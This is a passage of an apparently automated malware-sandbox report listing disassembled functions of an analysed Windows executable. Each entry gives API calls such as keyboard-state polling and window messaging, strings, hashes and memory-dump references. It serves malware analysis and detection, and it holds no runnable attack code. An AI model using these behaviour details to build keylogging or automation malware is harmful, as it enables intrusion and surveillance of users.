                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __wcsicoll$ClassMessageNameParentSend
                                                                                                                                                    • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                                                                                    • API String ID: 3125838495-3381328864
                                                                                                                                                    • Opcode ID: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                    • Instruction ID: b9a51c7f116d0e73852bd225d20f6d8bcb5f39b8f57bd3164038c04ed7d94027
                                                                                                                                                    • Opcode Fuzzy Hash: 17bab07e815737d0aecd422002c3b7a0f260523ca91fc6be5302b60c0052203b
                                                                                                                                                    • Instruction Fuzzy Hash: C6110AB1E447017BFE10BA659D46EBB339C9B54B11F00051BFE44D7242F6ACA94147A9
                                                                                                                                                    Function 004491B9 Relevance: 19.7, APIs: 13, Instructions: 246windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 004492A4
                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 004492B7
                                                                                                                                                    • CharNextW.USER32(?,?,?,000000FF,?), ref: 004492E9
                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 00449301
                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,?), ref: 00449332
                                                                                                                                                    • SendMessageW.USER32(?,?,000000FF,?), ref: 00449349
                                                                                                                                                    • SendMessageW.USER32(?,?,00000000,00000000), ref: 0044935C
                                                                                                                                                    • SendMessageW.USER32(?,00000402,?), ref: 00449399
                                                                                                                                                    • SendMessageW.USER32(?,000000C2,00000001,?), ref: 0044940D
                                                                                                                                                    • SendMessageW.USER32(?,00001002,00000000,?), ref: 00449477
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessageSend$CharNext
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1350042424-0
                                                                                                                                                    • Opcode ID: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                    • Instruction ID: 867fdc7b80e212b75fe5daf06e5219747a853435bb2a874e280223eddbea68d3
                                                                                                                                                    • Opcode Fuzzy Hash: 0066c399e5a393c923680e2e66105d8530035c3b09cc99687380ea8ee93f4497
                                                                                                                                                    • Instruction Fuzzy Hash: 5B81D535A00119BBEB10CF85DD80FFFB778FB55720F10825AFA14AA280D7B99D4197A4
                                                                                                                                                    Function 00478656 Relevance: 19.4, APIs: 2, Strings: 9, Instructions: 197COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                      • Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C
                                                                                                                                                      • Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0
                                                                                                                                                    • GetDriveTypeW.KERNEL32(?), ref: 004787B9
                                                                                                                                                    • _wcscpy.LIBCMT ref: 004787E5
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: BuffCharDriveLowerType_wcscpy_wcslen
                                                                                                                                                    • String ID: \VH$a$all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                    • API String ID: 3052893215-2127371420
                                                                                                                                                    • Opcode ID: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                    • Instruction ID: 541bc2b2506c052d744bcb7e7e177e26c036821b53f5a58429f0f0853ea8de24
                                                                                                                                                    • Opcode Fuzzy Hash: d2cef25e8da5c5e3ff62787a2d5bf57075b394b4544bde345958b2b0489681b6
                                                                                                                                                    • Instruction Fuzzy Hash: 4761C1716443018BD700EF14CC85B9BB7D4AB84348F14892FF949AB382DB79E94987AB
                                                                                                                                                    Function 0045E737 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 163COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E77F
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • LoadStringW.USER32(?,?,?,00000FFF), ref: 0045E7A0
                                                                                                                                                    • __swprintf.LIBCMT ref: 0045E7F7
                                                                                                                                                    • _wprintf.LIBCMT ref: 0045E8B3
                                                                                                                                                    • _wprintf.LIBCMT ref: 0045E8D7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                    • API String ID: 2295938435-2354261254
                                                                                                                                                    • Opcode ID: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                    • Instruction ID: 453f5dd12ee62c270a242db3517b58e8b6225e49c0ff470bc5072f32437c925c
                                                                                                                                                    • Opcode Fuzzy Hash: bb058454d561a71d3962b6834df81d7638d9abf9c215052f6de6d44e2e152ebf
                                                                                                                                                    • Instruction Fuzzy Hash: 6A519E71A10219ABDB14EB91CC85EEF7778AF44314F14407EF90477292DB78AE49CBA8
                                                                                                                                                    Function 004531B1 Relevance: 19.4, APIs: 7, Strings: 4, Instructions: 160COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: __swprintf_wcscpy$__i64tow__itow
                                                                                                                                                    • String ID: %.15g$0x%p$False$True
                                                                                                                                                    • API String ID: 3038501623-2263619337
                                                                                                                                                    • Opcode ID: 590827ce7b77b8aad8d77ae30f890fa54b52bbd446dfbd0357f9fd69017812b4
                                                                                                                                                    • Instruction ID: fd507a47f7d2c8f7f5848ea17d112ce969af4838d766d220e6d3988dad71e25c
                                                                                                                                                    • Opcode Fuzzy Hash: 590827ce7b77b8aad8d77ae30f890fa54b52bbd446dfbd0357f9fd69017812b4
                                                                                                                                                    • Instruction Fuzzy Hash: 264108729001005BDB10EF75DC42FAAB364EF55306F0445ABFE09CB242EA39DA48C79A
                                                                                                                                                    Function 0045E538 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 154COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • LoadStringW.USER32(?,00000066,?,00000FFF), ref: 0045E580
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • LoadStringW.USER32(?,00000072,?,00000FFF), ref: 0045E59F
                                                                                                                                                    • __swprintf.LIBCMT ref: 0045E5F6
                                                                                                                                                    • _wprintf.LIBCMT ref: 0045E6A3
                                                                                                                                                    • _wprintf.LIBCMT ref: 0045E6C7
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LoadString_wprintf$__swprintf_memmove_wcslen
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s:$%s (%d) : ==> %s:%s%s$Line %d (File "%s"):$^ ERROR
                                                                                                                                                    • API String ID: 2295938435-8599901
                                                                                                                                                    • Opcode ID: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                    • Instruction ID: ff3e2b23dced8a629e5b21f12e79e468b5cd48208a3d74017576322ff0354a8f
                                                                                                                                                    • Opcode Fuzzy Hash: c66a723599ffab058b3f3cea1f0729b04811ebb293e3d225dd53f192e4035716
                                                                                                                                                    • Instruction Fuzzy Hash: 9A519171D00109ABDB14EBA1C845EEF7778EF44304F50847EF91477292EA78AE49CBA8
                                                                                                                                                    Function 00443B61 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 99sleepwindowtimeCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • timeGetTime.WINMM ref: 00443B67
                                                                                                                                                      • Part of subcall function 0040C620: timeGetTime.WINMM(0042DD5D), ref: 0040C620
                                                                                                                                                    • Sleep.KERNEL32(0000000A), ref: 00443B9F
                                                                                                                                                    • FindWindowExW.USER32(00000000,00000000,BUTTON,00000000), ref: 00443BC8
                                                                                                                                                    • SetActiveWindow.USER32(00000000), ref: 00443BEC
                                                                                                                                                    • SendMessageW.USER32(00000000,000000F5,00000000,00000000), ref: 00443BFC
                                                                                                                                                    • SendMessageW.USER32(00000000,00000010,00000000,00000000), ref: 00443C22
                                                                                                                                                    • Sleep.KERNEL32(000000FA), ref: 00443C2D
                                                                                                                                                    • IsWindow.USER32(00000000), ref: 00443C3A
                                                                                                                                                    • EndDialog.USER32(00000000,00000000), ref: 00443C4C
                                                                                                                                                      • Part of subcall function 004439C1: GetWindowThreadProcessId.USER32(?,00000000), ref: 004439E4
                                                                                                                                                      • Part of subcall function 004439C1: GetCurrentThreadId.KERNEL32 ref: 004439EB
                                                                                                                                                      • Part of subcall function 004439C1: AttachThreadInput.USER32(00000000), ref: 004439F2
                                                                                                                                                    • EnumThreadWindows.USER32(00000000,Function_00033D09,00000000), ref: 00443C6B
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ThreadWindow$MessageSendSleepTimetime$ActiveAttachCurrentDialogEnumFindInputProcessWindows
                                                                                                                                                    • String ID: BUTTON
                                                                                                                                                    • API String ID: 1834419854-3405671355
                                                                                                                                                    • Opcode ID: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                    • Instruction ID: 3c6370bb7d17ad47abda0b7088cfd3672c19e1ca6c3f529de1b12449ce3ad6f8
                                                                                                                                                    • Opcode Fuzzy Hash: 0b90b562b2b8ddd8d32d3d53e67965f547c0866e24595f66544518a968b379f6
                                                                                                                                                    • Instruction Fuzzy Hash: 6B31E676784200BFE3349F74FD99F5A3B58AB55B22F10083AF600EA2A1D6B5A441876C
                                                                                                                                                    Function 00454014 Relevance: 19.3, APIs: 6, Strings: 5, Instructions: 93windowCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,?,?,?,0042820D,?,?,?,#include depth exceeded. Make sure there are no recursive includes,?), ref: 00454039
                                                                                                                                                    • LoadStringW.USER32(00000000), ref: 00454040
                                                                                                                                                      • Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
                                                                                                                                                      • Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57
                                                                                                                                                    • _wprintf.LIBCMT ref: 00454074
                                                                                                                                                    • __swprintf.LIBCMT ref: 004540A3
                                                                                                                                                    • MessageBoxW.USER32(00000000,?,?,00011010), ref: 0045410F
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: HandleLoadMessageModuleString__swprintf_memmove_wcslen_wprintf
                                                                                                                                                    • String ID: Error: $%s (%d) : ==> %s.: %s %s$.$Line %d (File "%s"):$Line %d:
                                                                                                                                                    • API String ID: 455036304-4153970271
                                                                                                                                                    • Opcode ID: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                    • Instruction ID: e2f14448b15a7dab571624068eda089460c560eca1c8ebe4dd0daaccfe0aa2c5
                                                                                                                                                    • Opcode Fuzzy Hash: 0cc89bd23a2e2e53ac7bb2b5ed0e913a3f1e972501752cb0da19f3bd95e8304c
                                                                                                                                                    • Instruction Fuzzy Hash: 3B31E872B0011997CB00EF95CD069AE3378AF88714F50445EFA0877282D678AE45C7A9
                                                                                                                                                    Function 00467C8E Relevance: 18.3, APIs: 12, Instructions: 310COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467D63
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,0000007F), ref: 00467DDC
                                                                                                                                                    • SafeArrayGetVartype.OLEAUT32(0000007F,?), ref: 00467E71
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(00000000,?), ref: 00467E9D
                                                                                                                                                    • _memmove.LIBCMT ref: 00467EB8
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000000), ref: 00467EC1
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467EDE
                                                                                                                                                    • _memmove.LIBCMT ref: 00467F6C
                                                                                                                                                    • SafeArrayAccessData.OLEAUT32(0000007F,?), ref: 00467FC1
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00000004), ref: 00467FAB
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411626
                                                                                                                                                      • Part of subcall function 004115D7: std::exception::exception.LIBCMT ref: 00411640
                                                                                                                                                      • Part of subcall function 004115D7: __CxxThrowException@8.LIBCMT ref: 00411651
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00467E48
                                                                                                                                                      • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                                                                    • SafeArrayUnaccessData.OLEAUT32(00479A50), ref: 00468030
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ArraySafe$Data$Access$Unaccess$_memmovestd::exception::exception$Exception@8ThrowVartype_malloc
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2170234536-0
                                                                                                                                                    • Opcode ID: 4c3f0b1365acc363140b046ec90304d59d81b8d313fde973431f466ecda86ae7
                                                                                                                                                    • Instruction ID: 6369f5c3f22445f0d5bf5c4520e4337682cbd46778e63a39b460943b9460954a
                                                                                                                                                    • Opcode Fuzzy Hash: 4c3f0b1365acc363140b046ec90304d59d81b8d313fde973431f466ecda86ae7
                                                                                                                                                    • Instruction Fuzzy Hash: 26B124716042059FD700CF59D884BAEB7B5FF88308F24856EEA05DB351EB3AD845CB6A
                                                                                                                                                    Function 00453C57 Relevance: 18.2, APIs: 12, Instructions: 190keyboardCOMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetKeyboardState.USER32(?), ref: 00453CE0
                                                                                                                                                    • SetKeyboardState.USER32(?), ref: 00453D3B
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A0), ref: 00453D5E
                                                                                                                                                    • GetKeyState.USER32(000000A0), ref: 00453D75
                                                                                                                                                    • GetAsyncKeyState.USER32(000000A1), ref: 00453DA4
                                                                                                                                                    • GetKeyState.USER32(000000A1), ref: 00453DB5
                                                                                                                                                    • GetAsyncKeyState.USER32(00000011), ref: 00453DE1
                                                                                                                                                    • GetKeyState.USER32(00000011), ref: 00453DEF
                                                                                                                                                    • GetAsyncKeyState.USER32(00000012), ref: 00453E18
                                                                                                                                                    • GetKeyState.USER32(00000012), ref: 00453E26
                                                                                                                                                    • GetAsyncKeyState.USER32(0000005B), ref: 00453E4F
                                                                                                                                                    • GetKeyState.USER32(0000005B), ref: 00453E5D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: State$Async$Keyboard
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 541375521-0
                                                                                                                                                    • Opcode ID: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                    • Instruction ID: 009fbf1908f75ed0a62addf5985db529f64a747a45b1090b1102dc3b9208550d
                                                                                                                                                    • Opcode Fuzzy Hash: a3f88cab2abdfc68c44a637c7b6f2bd83c4aa3bfdff3a706604d8f1b20d6ef18
                                                                                                                                                    • Instruction Fuzzy Hash: BC61DD3190478829FB329F6488057EBBBF45F12346F08459ED9C2162C3D7AC6B4CCB65
                                                                                                                                                    Function 004357B7 Relevance: 18.2, APIs: 12, Instructions: 184COMMON
                                                                                                                                                    Download Yara Rule
                                                                                                                                                    APIs
                                                                                                                                                    • GetDlgItem.USER32(?,00000001), ref: 004357DB
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004357ED
                                                                                                                                                    • MoveWindow.USER32(?,0000000A,?,?,?,00000000), ref: 00435857
                                                                                                                                                    • GetDlgItem.USER32(?,00000002), ref: 0043586A
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 0043587C
                                                                                                                                                    • MoveWindow.USER32(?,?,00000000,?,00000001,00000000), ref: 004358CE
                                                                                                                                                    • GetDlgItem.USER32(?,000003E9), ref: 004358DC
                                                                                                                                                    • GetWindowRect.USER32(00000000,?), ref: 004358EE
                                                                                                                                                    • MoveWindow.USER32(?,0000000A,00000000,?,?,00000000), ref: 00435933
                                                                                                                                                    • GetDlgItem.USER32(?,000003EA), ref: 00435941
                                                                                                                                                    • MoveWindow.USER32(00000000,0000000A,0000000A,?,-000000FB,00000000), ref: 0043595A
                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00435967
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000005.00000002.1725350100.0000000000401000.00000020.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    • Associated: 00000005.00000002.1725330556.0000000000400000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725396414.0000000000482000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725434790.0000000000490000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725459129.0000000000491000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.0000000000492000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725475428.00000000004A7000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    • Associated: 00000005.00000002.1725559836.00000000004AB000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                    • Snapshot File: hcaresult_5_2_400000_x.jbxd
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: Window$ItemMoveRect$Invalidate
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3096461208-0
                                                                                                                                                    • Opcode ID: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                    • Instruction ID: 6af1b44a8b8b1dd3dfd8c00d901dfbe31295268d39f582813a56aed3f3dd18d2
                                                                                                                                                    • Opcode Fuzzy Hash: 5d52927da84fb547f57ff0a94c85d4d7e4cc3ec4f802ea2f498aab0433028225
                                                                                                                                                    • Instruction Fuzzy Hash: 7C515FB1B00609ABCB18DF68CD95AAEB7B9EF88310F148529F905E7390E774ED008B54
